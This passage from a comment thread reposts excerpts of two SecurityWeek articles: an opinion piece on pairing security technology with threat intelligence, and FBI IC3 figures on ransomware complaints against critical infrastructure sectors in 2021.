    https://www.securityweek.com/demystifying-zero-trust

    Reply
  45. Tomi Engdahl says:

    A Sheep in Wolf’s Clothing: Technology Alone is a Security Facade
    https://www.securityweek.com/sheep-wolfs-clothing-technology-alone-security-facade

    The power of the technology to defend our IT systems is only as good as our ability to evolve it in the face of ever-changing adversary tradecraft

    After over 20 years in cybersecurity, I firmly believe that technology alone has not, and will not, win the war on cyberattacks. The idea of a purely technical solution providing lasting protection is flawed from the outset. The claims of security vendors that only bring technology to the cyber fight are the equivalent of a sheep in wolf’s clothing. It sounds great and looks convincing, but almost never lives up to the hype. Now, I am not saying that technology is not important, even critical, in this fight. It is critical if it is informed properly.

    As attack surfaces grew and the exploitation of IT systems became known, and eventually mainstream, the importance of threat intelligence became clear. This insight is still critical today and provides an important service to companies that want to understand their attack surface or have experienced a breach. Today, we also recognize that threat intelligence in continuum, combined with technology, is critical.

    Cyber threat intelligence has a few key principles it must follow for it to be effective. I will approach this from an email security perspective since that is the area in which I am most involved.

    1. Threat intelligence sources must be agnostic to vendor technology

    2. Your user base is a valuable source of intelligence for your enterprise

    3. Threat intelligence must be timely and actionable

    I am very much a technologist that loves building great products. I also believe technology alone will not solve cyberattacks. I know the power of the technology we build to defend our IT systems is only as good as our ability to evolve it in the face of ever-changing adversary tradecraft. Therefore, vendor agnostic technology, married with actionable, globally-sourced, and continually evolving intelligence, augmented by humans, is needed to defend our enterprises.

  46. Tomi Engdahl says:

    FBI: 649 Ransomware Attacks Reported on Critical Infrastructure Organizations in 2021
    https://www.securityweek.com/fbi-649-ransomware-attacks-reported-critical-infrastructure-organizations-2021

    The Federal Bureau of Investigation’s (FBI) Internet Crime Complaint Center (IC3) says it received 649 complaints of ransomware attacks targeting critical infrastructure organizations in 2021.

    Ransomware attacks hit 14 out of 16 critical infrastructure sectors last year, with healthcare and public health impacted the most, the IC3 notes in its 2021 Internet Crime Report (PDF).

    The IC3 received a total of 148 complaints of ransomware attacks on the healthcare sector, far more than the number of reported hits on the next most targeted sectors, namely financial services (89) and information technology (74).
